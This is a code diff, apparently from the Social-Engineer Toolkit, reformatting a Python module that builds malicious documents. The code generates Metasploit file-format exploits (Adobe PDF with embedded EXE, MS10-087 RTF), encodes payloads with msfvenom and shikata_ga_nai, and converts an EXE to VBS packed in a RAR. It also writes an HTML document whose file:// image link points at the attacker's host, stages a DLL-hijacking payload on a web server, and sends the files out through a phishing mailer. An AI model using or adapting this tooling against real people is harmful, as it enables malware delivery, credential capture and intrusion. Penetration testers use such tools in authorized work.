if exploit == '3': # 'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow'
|
if exploit == '3': # 'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow'
|
||||||
outfile = ("template.doc")
|
outfile = ("template.doc")
|
||||||
|
|
||||||
if exploit == '4': #'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)'
|
# 'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)'
|
||||||
|
if exploit == '4':
|
||||||
outfile = ("template.rtf")
|
outfile = ("template.rtf")
|
||||||
target = ("TARGET=1")
|
target = ("TARGET=1")
|
||||||
|
|
||||||
|
@ -82,22 +86,23 @@ while exploit == "INVALID":
|
||||||
if exploit != '3' and exploit != '4' and exploit != "17":
|
if exploit != '3' and exploit != '4' and exploit != "17":
|
||||||
outfile = ("template.pdf")
|
outfile = ("template.pdf")
|
||||||
|
|
||||||
|
|
||||||
debug_msg(me, 'current input was read as: %s' % exploit, 3)
|
debug_msg(me, 'current input was read as: %s' % exploit, 3)
|
||||||
exploit = ms_attacks(exploit)
|
exploit = ms_attacks(exploit)
|
||||||
debug_msg(me, 'value was translated to: %s' % exploit, 3)
|
debug_msg(me, 'value was translated to: %s' % exploit, 3)
|
||||||
|
|
||||||
if exploit == "INVALID":
|
if exploit == "INVALID":
|
||||||
print_warning("that choice is invalid...please try again or press ctrl-c to Cancel.")
|
print_warning(
|
||||||
|
"that choice is invalid...please try again or press ctrl-c to Cancel.")
|
||||||
time.sleep(2)
|
time.sleep(2)
|
||||||
|
|
||||||
# 'exploit' has been converted to the string by now, so we need to
|
# 'exploit' has been converted to the string by now, so we need to
|
||||||
# evaluate the string instead of the user input number from here on...
|
# evaluate the string instead of the user input number from here on...
|
||||||
if exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe" or exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs":
|
if exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe" or exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs":
|
||||||
print_info("Default payload creation selected. SET will generate a normal PDF with embedded EXE.")
|
print_info(
|
||||||
print """
|
"Default payload creation selected. SET will generate a normal PDF with embedded EXE.")
|
||||||
|
print("""
|
||||||
1. Use your own PDF for attack
|
1. Use your own PDF for attack
|
||||||
2. Use built-in BLANK PDF for attack\n"""
|
2. Use built-in BLANK PDF for attack\n""")
|
||||||
|
|
||||||
choicepdf = raw_input(setprompt(["4"], ""))
|
choicepdf = raw_input(setprompt(["4"], ""))
|
||||||
|
|
||||||
|
@ -106,7 +111,8 @@ if exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe" or exploit ==
|
||||||
|
|
||||||
if choicepdf == '1':
|
if choicepdf == '1':
|
||||||
# define if user wants to use their own pdf or built in one
|
# define if user wants to use their own pdf or built in one
|
||||||
inputpdf=raw_input(setprompt(["4"], "Enter path to your pdf [blank-builtin]"))
|
inputpdf = raw_input(
|
||||||
|
setprompt(["4"], "Enter path to your pdf [blank-builtin]"))
|
||||||
# if blank, then default to normal pdf
|
# if blank, then default to normal pdf
|
||||||
if inputpdf == "":
|
if inputpdf == "":
|
||||||
# change to default SET pdf
|
# change to default SET pdf
|
||||||
|
@ -141,13 +147,13 @@ if exploit_counter == 0:
|
||||||
if payload == 'exit':
|
if payload == 'exit':
|
||||||
exit_set()
|
exit_set()
|
||||||
|
|
||||||
if payload == "" : payload="2"
|
if payload == "":
|
||||||
|
payload = "2"
|
||||||
if payload == '4' or payload == '5' or payload == '6':
|
if payload == '4' or payload == '5' or payload == '6':
|
||||||
noencode = 1
|
noencode = 1
|
||||||
|
|
||||||
payload = ms_payload_3(payload)
|
payload = ms_payload_3(payload)
|
||||||
|
|
||||||
|
|
||||||
# imported from central, grabs ip address
|
# imported from central, grabs ip address
|
||||||
rhost = grab_ipaddress()
|
rhost = grab_ipaddress()
|
||||||
|
|
||||||
|
@ -179,18 +185,22 @@ if exploit_counter == 0:
|
||||||
os.remove(msfpath + "local/template.pdf")
|
os.remove(msfpath + "local/template.pdf")
|
||||||
|
|
||||||
filewrite = file(setdir + "/template.rc", "w")
|
filewrite = file(setdir + "/template.rc", "w")
|
||||||
filewrite.write("use exploit/windows/fileformat/adobe_pdf_embedded_exe\nset LHOST %s\nset LPORT %s\nset INFILENAME %s\nset FILENAME %s\nexploit\n" % (rhost,lport,inputpdf,output))
|
filewrite.write("use exploit/windows/fileformat/adobe_pdf_embedded_exe\nset LHOST %s\nset LPORT %s\nset INFILENAME %s\nset FILENAME %s\nexploit\n" %
|
||||||
|
(rhost, lport, inputpdf, output))
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
child = pexpect.spawn("%smsfconsole -r %s/template.rc" % (meta_path, setdir))
|
child = pexpect.spawn(
|
||||||
|
"%smsfconsole -r %s/template.rc" % (meta_path, setdir))
|
||||||
a = 1
|
a = 1
|
||||||
while a == 1:
|
while a == 1:
|
||||||
if os.path.isfile(setdir + "/template.pdf"):
|
if os.path.isfile(setdir + "/template.pdf"):
|
||||||
subprocess.Popen("cp " + msfpath + "local/%s %s" % (filename_code, setdir), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
|
subprocess.Popen("cp " + msfpath + "local/%s %s" % (filename_code, setdir),
|
||||||
|
stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
|
||||||
a = 2 # break
|
a = 2 # break
|
||||||
else:
|
else:
|
||||||
print_status("Waiting for payload generation to complete...")
|
print_status("Waiting for payload generation to complete...")
|
||||||
if os.path.isfile(msfpath + "local/" + outfile):
|
if os.path.isfile(msfpath + "local/" + outfile):
|
||||||
subprocess.Popen("cp %slocal/%s %s" % (msfpath, outfile,setdir), shell=True)
|
subprocess.Popen("cp %slocal/%s %s" %
|
||||||
|
(msfpath, outfile, setdir), shell=True)
|
||||||
time.sleep(3)
|
time.sleep(3)
|
||||||
|
|
||||||
print_status("Payload creation complete.")
|
print_status("Payload creation complete.")
|
||||||
|
@ -205,13 +215,17 @@ if exploit_counter == 0:
|
||||||
if noencode == 1:
|
if noencode == 1:
|
||||||
execute1 = ("exe")
|
execute1 = ("exe")
|
||||||
payloadname = ("vb.exe")
|
payloadname = ("vb.exe")
|
||||||
subprocess.Popen("%smsfvenom -p %s %s %s -e shikata_ga_nai --format=%s > %s/%s" % (meta_path,payload,rhost,lport,execute1,setdir,payloadname), shell=True)
|
subprocess.Popen("%smsfvenom -p %s %s %s -e shikata_ga_nai --format=%s > %s/%s" %
|
||||||
|
(meta_path, payload, rhost, lport, execute1, setdir, payloadname), shell=True)
|
||||||
if noencode == 0:
|
if noencode == 0:
|
||||||
subprocess.Popen("%smsfvenom -e x86/shikata_ga_nai -i %s/vb1.exe -o %s/vb.exe -t exe -c 3" % (meta_path,setdir,setdir), shell=True)
|
subprocess.Popen("%smsfvenom -e x86/shikata_ga_nai -i %s/vb1.exe -o %s/vb.exe -t exe -c 3" %
|
||||||
|
(meta_path, setdir, setdir), shell=True)
|
||||||
# Create the VB script here
|
# Create the VB script here
|
||||||
subprocess.Popen("%s/tools/exe2vba.rb %s/vb.exe %s/template.vbs" % (meta_path,setdir,setdir), shell=True)
|
subprocess.Popen("%s/tools/exe2vba.rb %s/vb.exe %s/template.vbs" %
|
||||||
|
(meta_path, setdir, setdir), shell=True)
|
||||||
print_info("Raring the VBS file.")
|
print_info("Raring the VBS file.")
|
||||||
subprocess.Popen("rar a %s/template.rar %s/template.vbs" % (setdir,setdir), shell=True)
|
subprocess.Popen("rar a %s/template.rar %s/template.vbs" %
|
||||||
|
(setdir, setdir), shell=True)
|
||||||
|
|
||||||
# NEED THIS TO PARSE DELIVERY OPTIONS TO SMTP MAILER
|
# NEED THIS TO PARSE DELIVERY OPTIONS TO SMTP MAILER
|
||||||
filewrite = file(setdir + "/payload.options", "w")
|
filewrite = file(setdir + "/payload.options", "w")
|
||||||
|
@ -221,13 +235,17 @@ if exploit_counter == 0:
|
||||||
if not os.path.isfile(setdir + "/fileformat.file"):
|
if not os.path.isfile(setdir + "/fileformat.file"):
|
||||||
sys.path.append("src/phishing/smtp/client/")
|
sys.path.append("src/phishing/smtp/client/")
|
||||||
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
|
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
|
||||||
try: reload(smtp_client)
|
try:
|
||||||
except: import smtp_client
|
reload(smtp_client)
|
||||||
|
except:
|
||||||
|
import smtp_client
|
||||||
|
|
||||||
# start the unc_embed attack stuff here
|
# start the unc_embed attack stuff here
|
||||||
if exploit == "unc_embed":
|
if exploit == "unc_embed":
|
||||||
rhost = grab_ipaddress
|
rhost = grab_ipaddress
|
||||||
import string,random
|
import string
|
||||||
|
import random
|
||||||
|
|
||||||
def random_string(minlength=6, maxlength=15):
|
def random_string(minlength=6, maxlength=15):
|
||||||
length = random.randint(minlength, maxlength)
|
length = random.randint(minlength, maxlength)
|
||||||
letters = string.ascii_letters + string.digits
|
letters = string.ascii_letters + string.digits
|
||||||
|
@ -238,24 +256,31 @@ if exploit == "unc_embed":
|
||||||
filewrite.write("exploit -j\r\n\r\n")
|
filewrite.write("exploit -j\r\n\r\n")
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
filewrite = file(setdir + "/template.doc", "w")
|
filewrite = file(setdir + "/template.doc", "w")
|
||||||
filewrite.write(r'''<html><head></head><body><img src="file://\\%s\%s.jpeg">''' %(rhost,rand_gen))
|
filewrite.write(
|
||||||
|
r'''<html><head></head><body><img src="file://\\%s\%s.jpeg">''' % (rhost, rand_gen))
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
sys.path.append("src/phishing/smtp/client/")
|
sys.path.append("src/phishing/smtp/client/")
|
||||||
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
|
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
|
||||||
try: reload(smtp_client)
|
try:
|
||||||
except: import smtp_client
|
reload(smtp_client)
|
||||||
|
except:
|
||||||
|
import smtp_client
|
||||||
|
|
||||||
# start the dll_hijacking stuff here
|
# start the dll_hijacking stuff here
|
||||||
if exploit == "dll_hijacking":
|
if exploit == "dll_hijacking":
|
||||||
sys.path.append("src/core/payloadgen")
|
sys.path.append("src/core/payloadgen")
|
||||||
debug_msg(me, "importing 'src.core.payloadgen.create_payloads'", 1)
|
debug_msg(me, "importing 'src.core.payloadgen.create_payloads'", 1)
|
||||||
try: reload(create_payloads)
|
try:
|
||||||
except: import create_payloads
|
reload(create_payloads)
|
||||||
|
except:
|
||||||
|
import create_payloads
|
||||||
|
|
||||||
sys.path.append("src/webattack/dll_hijacking")
|
sys.path.append("src/webattack/dll_hijacking")
|
||||||
debug_msg(me, "importing 'src.webattack.dll_hijacking.hijacking'", 1)
|
debug_msg(me, "importing 'src.webattack.dll_hijacking.hijacking'", 1)
|
||||||
try: reload(hijacking)
|
try:
|
||||||
except: import hijacking
|
reload(hijacking)
|
||||||
|
except:
|
||||||
|
import hijacking
|
||||||
|
|
||||||
# if we are not using apache
|
# if we are not using apache
|
||||||
if apache == 0:
|
if apache == 0:
|
||||||
|
@ -268,31 +293,37 @@ if exploit == "dll_hijacking":
|
||||||
filewrite.write("TEMPLATE=CUSTOM")
|
filewrite.write("TEMPLATE=CUSTOM")
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
time.sleep(1)
|
time.sleep(1)
|
||||||
subprocess.Popen("mkdir %s/web_clone;cp src/html/msf.exe %s/web_clone/x" % (setdir,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
subprocess.Popen("mkdir %s/web_clone;cp src/html/msf.exe %s/web_clone/x" % (
|
||||||
|
setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||||
child = pexpect.spawn("python src/html/web_server.py")
|
child = pexpect.spawn("python src/html/web_server.py")
|
||||||
# except: child.close()
|
# except: child.close()
|
||||||
# if we are using apache
|
# if we are using apache
|
||||||
if apache == 1:
|
if apache == 1:
|
||||||
subprocess.Popen("cp src/html/msf.exe %s/x.exe" % (apache_path), shell=True).wait()
|
subprocess.Popen("cp src/html/msf.exe %s/x.exe" %
|
||||||
|
(apache_path), shell=True).wait()
|
||||||
|
|
||||||
if os.path.isfile(setdir + "/meta_config"):
|
if os.path.isfile(setdir + "/meta_config"):
|
||||||
# if we aren't using the infectious method then do normal routine
|
# if we aren't using the infectious method then do normal routine
|
||||||
if not os.path.isfile("%s/fileformat.file" % (setdir)):
|
if not os.path.isfile("%s/fileformat.file" % (setdir)):
|
||||||
print_info("This may take a few to load MSF...")
|
print_info("This may take a few to load MSF...")
|
||||||
try:
|
try:
|
||||||
child1=pexpect.spawn("%smsfconsole -L -r %s/meta_config" % (meta_path,setdir))
|
child1 = pexpect.spawn(
|
||||||
|
"%smsfconsole -L -r %s/meta_config" % (meta_path, setdir))
|
||||||
except:
|
except:
|
||||||
try:
|
try:
|
||||||
child1.close()
|
child1.close()
|
||||||
except: pass
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
# get the emails out
|
# get the emails out
|
||||||
# if we aren't using the infectious method then do the normal routine
|
# if we aren't using the infectious method then do the normal routine
|
||||||
if not os.path.isfile("%s/fileformat.file" % (setdir)):
|
if not os.path.isfile("%s/fileformat.file" % (setdir)):
|
||||||
sys.path.append("src/phishing/smtp/client/")
|
sys.path.append("src/phishing/smtp/client/")
|
||||||
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
|
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
|
||||||
try: reload(smtp_client)
|
try:
|
||||||
except: import smtp_client
|
reload(smtp_client)
|
||||||
|
except:
|
||||||
|
import smtp_client
|
||||||
try:
|
try:
|
||||||
child1.interact()
|
child1.interact()
|
||||||
except:
|
except:
|
||||||
|
@ -300,4 +331,5 @@ if exploit == "dll_hijacking":
|
||||||
try:
|
try:
|
||||||
child.close()
|
child.close()
|
||||||
child1.close()
|
child1.close()
|
||||||
except: pass
|
except:
|
||||||
|
pass
|
||||||
|
|
|
@ -8,8 +8,11 @@ me = mod_name()
|
||||||
|
|
||||||
sys.path.append("src/core")
|
sys.path.append("src/core")
|
||||||
debug_msg(me, "re-importing 'src.core.setcore'", 1)
|
debug_msg(me, "re-importing 'src.core.setcore'", 1)
|
||||||
try: reload(setcore)
|
try:
|
||||||
except: import setcore
|
reload(setcore)
|
||||||
print "[---] Updating the Social Engineer Toolkit FileFormat Exploit List [---]"
|
except:
|
||||||
generate_list=subprocess.Popen("%s/msfcli | grep fileformat > src/core/msf_attacks/database/msf.database" % (meta_path), shell=True).wait()
|
import setcore
|
||||||
print "[---] Database is now up-to-date [---]"
|
print("[---] Updating the Social Engineer Toolkit FileFormat Exploit List [---]")
|
||||||
|
generate_list = subprocess.Popen(
|
||||||
|
"%s/msfcli | grep fileformat > src/core/msf_attacks/database/msf.database" % (meta_path), shell=True).wait()
|
||||||
|
print("[---] Database is now up-to-date [---]")
|
||||||
|
|
Loading…
Reference in a new issue